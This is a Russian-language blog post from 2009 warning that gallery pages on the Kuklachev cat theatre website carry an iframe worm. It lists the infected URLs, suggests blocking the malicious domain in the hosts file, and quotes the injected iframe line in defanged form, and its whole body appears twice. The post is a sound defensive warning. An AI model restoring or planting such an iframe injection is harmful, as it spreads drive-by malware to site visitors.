|
|
Пишет pe3yc (![[info]](http://lj.rossia.org/img/userinfo.gif){kind=small} pe3yc)@ 2009-12-05 00:00:00 |
 |
|
 |
|
|
|
|
|
|
 |
|
 |
ЧБСХ, сайт кошачьего театра заражен довольно мерзкими вирусами, что и было сейчас обнаружено моим замечательным лицензионным Авастом (да, да, это product placement).
На входной странице галереи их ещё нет, но не рекомендую заходить в сами галереи, если не уверены в своём антивирусе:
----------------------------------------
http://www.kuklachev.ru/gallery/yuriy_k
http://www.kuklachev.ru/gallery/dmitriy
http://www.kuklachev.ru/gallery/arc
http://www.kuklachev.ru/gallery/afisha/
http://www.kuklachev.ru/gallery/press/
http://www.kuklachev.ru/gallery/video/
http://www.kuklachev.ru/gallery/queen_o
http://www.kuklachev.ru/gallery/cat
http://www.kuklachev.ru/gallery/boris/
http://www.kuklachev.ru/gallery/ice_fan
----------------------------------------
Ну, или сначала внесите в файл /WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS строчку:
127.0.0.1 google-analistyc.net
и обязательно перегрузите браузер, а потом уже заходить можно.
Это довольно примитивный, но неприятный айфреймовый ворм, который запускает скрипты с этого самого google-analistyc.net - выглядит этот код очень просто, одной строчкой:
[ifrаmе srс="httр://gооglе-аnаlistyс.nеt/in.сgi?1
(Угловые скобки заменены на квадратные и некоторые символы на кириллические во избежание случайного заражения).
Скрипт по этому адресу содержит целый букет троянов и эксплойтов. Если вы не специалист, рекомендую туда не лезть, а то ещё запустите этот скрипт, подсадите себе руткит, а мне карму отмывать.
Одно из двух - либо это обычное распиздяйство и неквалифицированность администратора сайта, либо часть объявленного клоунами плана по упромысливанию интернета. Во втором случае конспирология учит нас, что ддосят тифаретник именно с зараженных этим эксплойтом компьютеров. Даже не знаю, какая версия интереснее..
Update: Нас всё-таки читают, что приятно. Хост gооglе-аnаlistyс.nеt уже не резолвится, слава яйцам. Упаковка вируса на сайте осталась, но его наполнение на данный момент неактивно. Впрочем, поскольку дыра никуда не делась, контейнер снова может быть активирован в любой момент - пока админы сайта не почешутся вычистить заразу, сменить пароли доступа и не начнут соблюдать веб-гигиену, опасность продолжает нависать.
Вы как хотите, а я склоняюсь к версии, что это простое, но злостное распиздяйство. Думаю, что если эта пакость там сидит давно, то количество зараженных компьютеров вполне могло быть значительным. Люди, которые ходят на сайт кошачьего театра, вряд ли слишком умудрены в компьютерных науках и вряд ли тщательно следят за кибербезопасностью. Вполне могли нахвататься руткитов и эксплойтов.
Update 11/12/2009: Хост gооglе-аnаlistyс.nеt снова резолвится и содержит активное вирусное наполнение. Будьте осторожны.
На входной странице галереи их ещё нет, но не рекомендую заходить в сами галереи, если не уверены в своём антивирусе:
----------------------------------------
http://www.kuklachev.ru/gallery/yuriy_k
http://www.kuklachev.ru/gallery/dmitriy
http://www.kuklachev.ru/gallery/arc
http://www.kuklachev.ru/gallery/afisha/
http://www.kuklachev.ru/gallery/press/
http://www.kuklachev.ru/gallery/video/
http://www.kuklachev.ru/gallery/queen_o
http://www.kuklachev.ru/gallery/cat
http://www.kuklachev.ru/gallery/boris/
http://www.kuklachev.ru/gallery/ice_fan
----------------------------------------
Ну, или сначала внесите в файл /WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS строчку:
127.0.0.1 google-analistyc.net
и обязательно перегрузите браузер, а потом уже заходить можно.
Это довольно примитивный, но неприятный айфреймовый ворм, который запускает скрипты с этого самого google-analistyc.net - выглядит этот код очень просто, одной строчкой:
[ifrаmе srс="httр://gооglе-аnаlistyс.nеt/in.сgi?1
(Угловые скобки заменены на квадратные и некоторые символы на кириллические во избежание случайного заражения).
Скрипт по этому адресу содержит целый букет троянов и эксплойтов. Если вы не специалист, рекомендую туда не лезть, а то ещё запустите этот скрипт, подсадите себе руткит, а мне карму отмывать.
Одно из двух - либо это обычное распиздяйство и неквалифицированность администратора сайта, либо часть объявленного клоунами плана по упромысливанию интернета. Во втором случае конспирология учит нас, что ддосят тифаретник именно с зараженных этим эксплойтом компьютеров. Даже не знаю, какая версия интереснее..
Update: Нас всё-таки читают, что приятно. Хост gооglе-аnаlistyс.nеt уже не резолвится, слава яйцам. Упаковка вируса на сайте осталась, но его наполнение на данный момент неактивно. Впрочем, поскольку дыра никуда не делась, контейнер снова может быть активирован в любой момент - пока админы сайта не почешутся вычистить заразу, сменить пароли доступа и не начнут соблюдать веб-гигиену, опасность продолжает нависать.
Вы как хотите, а я склоняюсь к версии, что это простое, но злостное распиздяйство. Думаю, что если эта пакость там сидит давно, то количество зараженных компьютеров вполне могло быть значительным. Люди, которые ходят на сайт кошачьего театра, вряд ли слишком умудрены в компьютерных науках и вряд ли тщательно следят за кибербезопасностью. Вполне могли нахвататься руткитов и эксплойтов.
Update 11/12/2009: Хост gооglе-аnаlistyс.nеt снова резолвится и содержит активное вирусное наполнение. Будьте осторожны.
